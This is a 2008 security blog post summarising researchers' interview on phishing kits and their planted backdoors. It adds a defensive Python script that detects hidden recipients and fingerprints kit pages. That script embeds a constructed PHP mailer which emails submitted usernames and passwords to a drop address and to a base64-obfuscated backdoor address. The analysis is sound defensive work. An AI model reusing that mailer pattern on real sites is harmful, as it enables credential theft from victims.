Spies in the Phishing Underground

February 1, 2008

Recently there was a good interview with Nitesh Dhanjani and Billy Rios in Help Net Security. “Both Nitesh and Billy are well-known security researchers that have recently managed to infiltrate the phishing underground.”

Some interesting points they made from their undercover days are:

– The average phisher is not a super-smart techie. Phishing kits have made executing attacks trivial. Most phishing sites are a variant of a small set of phishing kits. “Many think that phishing sites are all custom jobs that a particular phisher has developed and deployed. The reality is pre-made, ready-to-deploy, turnkey sites are already created for practically every major organization that you can think of.”

– Many of the phishing kits have backdoors written into the source code so that phishers can phish the phishers.

– One of the “techniques” used by Nitesh and Billy was a simple Google search for a static string in a popular phishing kit. “The results completely stunned us. Social Security numbers, bank account numbers, dates of birth, ATM PINs, addresses, credentials to online banking accounts, all out in the open, a lot of which was collected from victims only a few hours ago.”

– They believe that the core problem is the use of static identifiers, particularly Social Security Numbers and credit card numbers. “Unfortunately, financial institutions only take into account their cost when making this decision, but it also ends up affecting the lives of millions of people who have to pay with their identities when such fraud is committed.”
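As an added illustration of the second and third points above (this is example code written for this summary, not code from the interview or from the researchers), the script below does two things on constructed input: it pulls recipient addresses out of a kit's PHP mailer, including one hidden behind base64_decode() the way a kit-author backdoor would hide it, and it matches a saved page against a small set of hypothetical kit fingerprint strings, which is the offline counterpart of the Google search for a kit's static string. The addresses, kit names and signature strings are all made up for the example.

```python
import base64
import re

# Constructed sample of a phishing-kit mailer (not a real kit).  The visible
# recipient is the phisher's drop address; the second mail() call sends the
# same stolen credentials to a base64-hidden address, i.e. the kit author's
# backdoor.  Both addresses are hypothetical.
SAMPLE_KIT_PHP = r'''<?php
$to = "drop@example.net";
$subject = "Bank Login";
$msg = "User: " . $_POST['user'] . " Pass: " . $_POST['pass'];
mail($to, $subject, $msg);
mail(base64_decode("aGlkZGVuQGV4YW1wbGUub3Jn"), $subject, $msg);
?>'''

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
B64_CALL_RE = re.compile(r'''base64_decode\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)''')


def find_recipients(php_source):
    """Return (visible, hidden) recipient addresses found in kit source.

    'hidden' holds addresses that only appear after decoding a base64_decode()
    argument, the simplest of the obfuscations used to plant a backdoor.
    """
    visible = set(EMAIL_RE.findall(php_source))
    hidden = set()
    for encoded in B64_CALL_RE.findall(php_source):
        try:
            decoded = base64.b64decode(encoded, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        hidden.update(EMAIL_RE.findall(decoded))
    return sorted(visible), sorted(hidden - visible)


# Constructed kit fingerprints (hypothetical strings, not from a real kit):
# static text a kit stamps into every page it generates.  These are the kind
# of strings the researchers fed to a search engine; here they are matched
# against pages already saved locally.
KIT_SIGNATURES = {
    "kit-alpha": [
        "<!-- generated by kit alpha -->",
        'action="login.php"',
        'name="kitid"',
    ],
    "kit-beta": [
        "<!-- beta builder v2 -->",
        'action="verify.php"',
        'name="sessid"',
    ],
}

# Constructed saved page that a deployment of "kit-alpha" might produce.
SAMPLE_PAGE = '''<html><!-- generated by kit alpha --><body>
<form method="post" action="login.php">
<input type="hidden" name="kitid" value="1">
<input name="user"><input name="pass" type="password">
</form></body></html>'''


def fingerprint_page(html, signatures=KIT_SIGNATURES, threshold=0.5):
    """Return (kit_name, fraction of signature strings matched) for the
    best-matching kit, or None if no kit reaches the threshold.

    A fraction rather than an all-or-nothing match is used because kits are
    usually edited a little by each phisher who deploys them.
    """
    best = None
    for kit, strings in signatures.items():
        hits = sum(1 for s in strings if s in html)
        score = hits / len(strings)
        if score >= threshold and (best is None or score > best[1]):
            best = (kit, score)
    return best


if __name__ == "__main__":
    print(find_recipients(SAMPLE_KIT_PHP))
    print(fingerprint_page(SAMPLE_PAGE))
```

Run against the constructed sample, find_recipients() reports drop@example.net as the visible recipient and hidden@example.org as the backdoor, and fingerprint_page() attributes the page to kit-alpha with all three signature strings present. Real kits hide the backdoor address behind more than a single base64 layer, so a production version would need to chase nested decodes and string concatenation; the two functions here only show the shape of the check.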

I’m pleased that their recommended solution for fighting phishing wasn’t along the lines of “better user education will solve all the problems.”


Entry filed under: fraud, personal_info, security.


This blog is no longer updated. See the About page for more info. I'm currently active on Twitter.
